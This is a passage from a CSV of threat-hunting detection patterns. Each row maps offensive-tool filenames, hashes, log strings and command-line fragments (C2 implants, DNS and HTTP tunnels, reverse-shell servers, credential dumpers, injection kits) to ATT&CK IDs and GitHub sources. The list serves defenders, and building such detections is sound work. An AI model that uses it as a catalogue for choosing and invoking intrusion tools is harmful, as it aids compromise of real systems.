tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*DeNiSe-master.zip*",".{0,1000}DeNiSe\-master\.zip.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" 
"*DeNiSePkg.py*",".{0,1000}DeNiSePkg\.py.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*deploycaptureserver.ps1*",".{0,1000}deploycaptureserver\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*DeployPrinterNightmare.exe*",".{0,1000}DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Description'>IE Passwords Viewer*",".{0,1000}Description\'\>IE\sPasswords\sViewer.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*DesertNut.csproj*",".{0,1000}DesertNut\.csproj.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut.exe*",".{0,1000}DesertNut\.exe.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut.sln*",".{0,1000}DesertNut\.sln.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut_h.cs*",".{0,1000}DesertNut_h\.cs.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*-destPipe * -pipeHost * -bindPort *",".{0,1000}\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-bindPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 
- T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Destroying all droplets*",".{0,1000}Destroying\sall\sdroplets.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*details-c80a6994018b23dc.js*",".{0,1000}details\-c80a6994018b23dc\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*detect ntdll.dll*",".{0,1000}detect\sntdll\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Detected a Windows Server version not compatible with JuicyPotato*",".{0,1000}Detected\sa\sWindows\sServer\sversion\snot\scompatible\swith\sJuicyPotato.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*Detected possible phantom shell command*",".{0,1000}Detected\spossible\sphantom\sshell\scommand.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*detect-hooksx64.*",".{0,1000}detect\-hooksx64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*dev.l1qu1d.net/wraith-labs/wraith*",".{0,1000}dev\.l1qu1d\.net\/wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*dev-2null/ADCollector*",".{0,1000}dev\-2null\/ADCollector.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*DEV-COBBR\\TestAdmin*",".{0,1000}DEV\-COBBR\\\\TestAdmin.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Device architecture unknown. Download cloudflared/loclx manually*",".{0,1000}Device\sarchitecture\sunknown\.\sDownload\scloudflared\/loclx\smanually.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f*",".{0,1000}df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc*",".{0,1000}df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb*",".{0,1000}df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef*",".{0,1000}df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301*",".{0,1000}df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" 
"*df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d*",".{0,1000}df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0*",".{0,1000}df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f*",".{0,1000}df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46*",".{0,1000}dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dfbc5037fe0229e15f6f15775117aef5*",".{0,1000}dfbc5037fe0229e15f6f15775117aef5.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*dfscoerce.py -d *",".{0,1000}dfscoerce\.py\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dfscoerce.py*",".{0,1000}dfscoerce\.py.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*dfscoerce_check*",".{0,1000}dfscoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DFSCoerce-main*",".{0,1000}DFSCoerce\-main.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*",".{0,1000}dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*",".{0,1000}dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration 
simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*",".{0,1000}dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ\-\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dhcp_sniffer.py*",".{0,1000}dhcp_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*dhcp6.spoof.*",".{0,1000}dhcp6\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Dialupass.exe*",".{0,1000}Dialupass\.exe.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. 
You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dialupass.zip*",".{0,1000}Dialupass\.zip.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dicts*generic-usernames.txt*",".{0,1000}dicts.{0,1000}generic\-usernames\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*dicts/ftp_pswd.txt*",".{0,1000}dicts\/ftp_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*dicts/ssh_default.txt*",".{0,1000}dicts\/ssh_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port 
scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*dicts/ssh_pswd.txt*",".{0,1000}dicts\/ssh_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*diego-treitos/linux-smart-enumeration*",".{0,1000}diego\-treitos\/linux\-smart\-enumeration.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*dievus/lnkbomb*",".{0,1000}dievus\/lnkbomb.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*digitalocean-droplet-openvpn-all.jar*",".{0,1000}digitalocean\-droplet\-openvpn\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - 
T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*DigitalOceanProxyTab$1.class*",".{0,1000}DigitalOceanProxyTab\$1\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*DigitalSignature-Hijack.ps1*",".{0,1000}DigitalSignature\-Hijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Ding Ding Ding! Email opened!*",".{0,1000}Ding\sDing\sDing!\sEmail\sopened!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*dinjector /i:* /p:*",".{0,1000}dinjector\s\/i\:.{0,1000}\s\/p\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*DInjector.csproj*",".{0,1000}DInjector\.csproj.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector.Detonator*",".{0,1000}DInjector\.Detonator.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector.dll*",".{0,1000}DInjector\.dll.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector/Dinjector*",".{0,1000}DInjector\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of 
